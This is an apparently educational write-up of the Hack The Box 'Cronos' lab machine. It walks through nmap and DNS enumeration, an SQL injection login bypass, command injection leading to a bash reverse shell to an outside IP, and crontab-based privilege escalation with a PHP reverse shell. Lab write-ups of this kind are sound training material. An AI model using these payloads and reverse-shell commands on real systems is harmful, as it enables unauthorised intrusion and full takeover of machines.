Hack The Box (HTB) Writeup - Cronos

Today we will solve Cronos Box of Medium difficulty level from Hack The Box (HTB). If you are new, HTB is practice online lab to learn penetration testing. This box is helpful in preparing OSCP certification.

Summary:

  • Run Nmap to find open ports and services
  • Enumerate DNS
  • Add IP and identified hostnames in /etc/hosts
  • Enumerate HTTP
  • Identify login on admin.cronos.htb
  • Use SQL Injection to bypass login
  • Check for Command Injection
  • Reverse shell and locate user.txt flag
  • Transfer Linux Privilege scripts from local machine to low privileged machine
  • Results
  • php reverse shell in crontab
  • Reverse shell and locate root.txt
source: hackthebox

Start with Nmap

Initial Scan

nmap 10.10.10.13

Run default scripts

nmap -sC -sV 10.10.10.13

Scan all ports

nmap -p- 10.10.10.13

Run UDP scan

nmap -sU 10.10.10.13

Using dig command to identify urls

dig axfr cronos.htb @10.10.10.13

Add urls in /etc/hosts by using nano /etc/hosts

Check admin.cronos.htb on browser

Try using SQL Injection Payloads from link, able to login successfully by using below payload

' or 1=1 limit 1 -- -+

Try command injection, use ls command. It confirms command injection vulnerability is available in web application.

Intercept request in Burpsuite and use command injection vulnerability to get a reverse shell.

bash -c 'bash -i /dev/tcp/10.10.14.16/8000 0>&1'

Got user.txt

Privilege escalation

Spawn a tty shell

python -c 'import pty; pty.spawn("/bin/sh")'

Run below commands to know the flavor of box

uname -a
cat /proc/version
cat /etc/issue

Identify Privilege Escalation script for Ubuntu 16.04.2. Click Here to download on local machine and then transfer it on compromised machine.

Run Privilege Escalation script

./linpeas.sh

Found /var/www/laravel/artisan on run of linpeas.sh script

Check crontab

Download php-reverse-shell.php script

Change local IP and port number

To catch a reverse shell, set nc and run php script

Got a reverse shell

Got root.

Subscribe us to receive more such articles updates in your email.

If you have any questions, feel free to ask in the comments section below. Nothing gives me greater joy than helping my readers!

Disclaimer: This tutorial is for educational purpose only. Individual is solely responsible for any illegal act.

You may also like...

Leave a Reply

Your email address will not be published.